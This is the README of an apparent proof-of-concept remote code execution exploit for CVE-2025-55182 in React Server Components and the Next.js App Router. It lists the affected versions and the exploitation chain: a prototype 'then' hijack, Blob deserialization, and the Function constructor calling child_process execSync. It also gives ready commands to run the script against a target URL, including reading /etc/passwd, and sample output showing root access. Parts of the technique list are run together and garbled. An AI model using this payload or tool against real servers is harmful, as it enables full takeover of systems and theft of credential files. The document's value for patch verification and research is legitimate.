
Proof-of-Concept RCE pour CVE‑2025‑55182 exploitant le protocole React Flight sur Next.js App Router.
Author: rl0x01
CVE-2025-55182 is a critical (CVSS 10.0) Remote Code Execution (RCE) vulnerability affecting React Server Components via the Flight protocol.
| Next.js | React |
|---|---|
| 14.3.0-canary.77 to 15.0.4 | 19.0.0 |
| 15.1.1-canary.0 to 15.1.8 | 19.1.0 |
| 15.2.0-canary.0 to 15.2.5 | 19.1.1 |
| 15.3.0-canary.0 to 15.3.5 | 19.2.0 |
| 15.4.0-canary.0 to 15.4.7 | |
| 15.5.1-canary.0 to 15.5.6 | |
| 16.0.0-canary.0 to 16.0.6 |
| Next.js |
|---|
| 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+ |
$@ to get a raw Chunk reference.then with Chunk.prototype.then via $1:__proto__:thenstatus to resolved_model to trigger initializeModelChunk$B1337 to trigger Blob deserialization_formData.get to Function constructor_prefix contains the JS code to executeThe code is evaluated via:
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")
pip install -r requirements.txt
python cve_2025_55182_poc.py https://target.com --check-only
# Default command (id)
python cve_2025_55182_poc.py https://target.com
# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"
| Option | Description |
|---|---|
url | Target URL (required) |
-c, --command | Command to execute (default: id) |
--check-only | Only check vulnerability |
-t, --timeout | Timeout in seconds (default: 15) |
-v, --verbose | Verbose output |
--raw | Show raw response |
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000
+======================================================================+
| CVE-2025-55182 - React Server Components RCE |
| React Flight Protocol Deserialization Vulnerability |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01
[*] Target: http://localhost:3000
[*] Timeout: 15s
[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received
[2/2] Executing command: whoami
[+] Payload sent!
============================================================
RESULT: whoami
============================================================
root
============================================================
CVE-2025-55182/
├── cve_2025_55182_poc.py # Main exploit script
├── requirements.txt # Python dependencies
├── README.md # Documentation
└── vulnerable-app/ # Vulnerable Next.js app for testing
├── package.json
├── next.config.js
└── app/
├── layout.js
├── page.js
└── actions.js
⚠️ This tool is provided for educational and authorized security testing purposes only.
Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal.